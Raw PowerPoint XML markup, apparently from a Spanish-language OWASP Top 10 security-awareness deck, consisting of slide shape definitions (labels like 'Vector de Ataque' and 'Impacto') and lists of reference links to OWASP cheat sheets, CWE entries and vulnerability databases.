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FF1"/>
    <a:srgbClr val="C2BFE3"/>
    <a:srgbClr val="83276B"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="FC9803"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="B93A32"/>
    <a:srgbClr val="672E3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6807" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="130" d="100"/>
          <a:sy n="130" d="100"/>
        </p:scale>
        <p:origin x="2010" y="-252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30.01.2018</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‹Nº›</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dirty="0"/>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1/30/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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dirty="0"/>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dirty="0"/>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‹Nº›</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dirty="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dirty="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dirty="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‹Nº›</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844631365"/>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AR" sz="900" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App. Específica</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AR" sz="900" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>¿Negocio?</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‹Nº›</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19001" y="1026000"/>
            <a:ext cx="6076999" cy="388800"/>
            <a:chOff x="19001" y="1044000"/>
            <a:chExt cx="6076999" cy="388200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2848055"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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="19001" y="1044000"/>
              <a:ext cx="6076999" cy="388200"/>
              <a:chOff x="19001" y="1056343"/>
              <a:chExt cx="6076999" cy="388200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2843935" y="1063543"/>
                <a:ext cx="1260140"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Debilidades</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a: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de Seguridad</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>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Impacto</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19001" y="1164105"/>
                <a:ext cx="484949" cy="196738"/>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Agente</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Vector de</a:t>
                </a:r>
                <a:b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s-AR" sz="950" b="1" noProof="0"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Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2843935"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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Conector recto 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A04D85-5019-4EC3-99D3-C4AFF1219322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="1221219"/>
            <a:ext cx="1371600" cy="3555"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="oval" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="55" name="Conector recto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B9416A-9AA6-46D7-9D44-5DA860085B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1988840" y="1220131"/>
            <a:ext cx="855095" cy="5730"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="oval" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Conector recto 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45BF8A66-9BDE-4AB7-8FD8-CB8885869712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691776" y="1221741"/>
            <a:ext cx="451224" cy="2511"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="oval" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectángulo 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3261AA4-2F80-4168-92C8-164547DB7E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32805" y="3270237"/>
            <a:ext cx="3351190" cy="244800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2BFE3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C2B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C2BFE3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectángulo 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F698E662-7175-4CD9-94DC-C1A89E6AB66D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3472340" y="3270237"/>
            <a:ext cx="3351190" cy="244800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2BFE3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C2B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C2BFE3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectángulo 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58711049-CF59-4F50-B653-0D52A4DD4F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="29440" y="6941118"/>
            <a:ext cx="3351190" cy="244800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2BFE3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C2B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C2BFE3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectángulo 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B77A715-98FE-4067-A735-D79446D06E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3473435" y="6941118"/>
            <a:ext cx="3351190" cy="244800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2BFE3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C2B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C2BFE3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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wasp.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/4.0/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-sa/4.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ASVS_V10_Communications" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V9_Data_Protection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcisecuritystandards.org/documents/Tokenization_Guidelines_Info_Supplement.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V7_Cryptography" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcisecuritystandards.org/pci_security/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://eur-lex.europa.eu/legal-content/ES/TXT/?uri=CELEX:32016R0679" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eugdpr.or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blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Web_Application_Firewall" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Document_type_definition" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Web_Services#SOAP" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injectio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we.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.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22.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/es/docs/Web/HTTP/Access_control_CORS" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jwt.io/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.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Testing_for_Error_Code_(OWASP-IG-006)"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configuration_management"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2.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xm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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="Externa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OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Client_Side_Testing" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)"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Java_Encoder_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Watering_hole_attack" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-Vulnerabilidades_de_Falsificaci%C3%B3n_de_Petici%C3%B3n_en_Sitios_Cruzados_(CSRF)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet"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owasp.org/index.php/ASVS_V1_Architecture" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://retirejs.github.io/"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slide" Target="slide13.xm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2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Heartbleed"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www.shodan.io/"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Map_Application_Architecture_(OTG-INFO-010)"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OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/"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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="Externa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ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Modelado_de_Amenaza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Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Chapter" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId31" 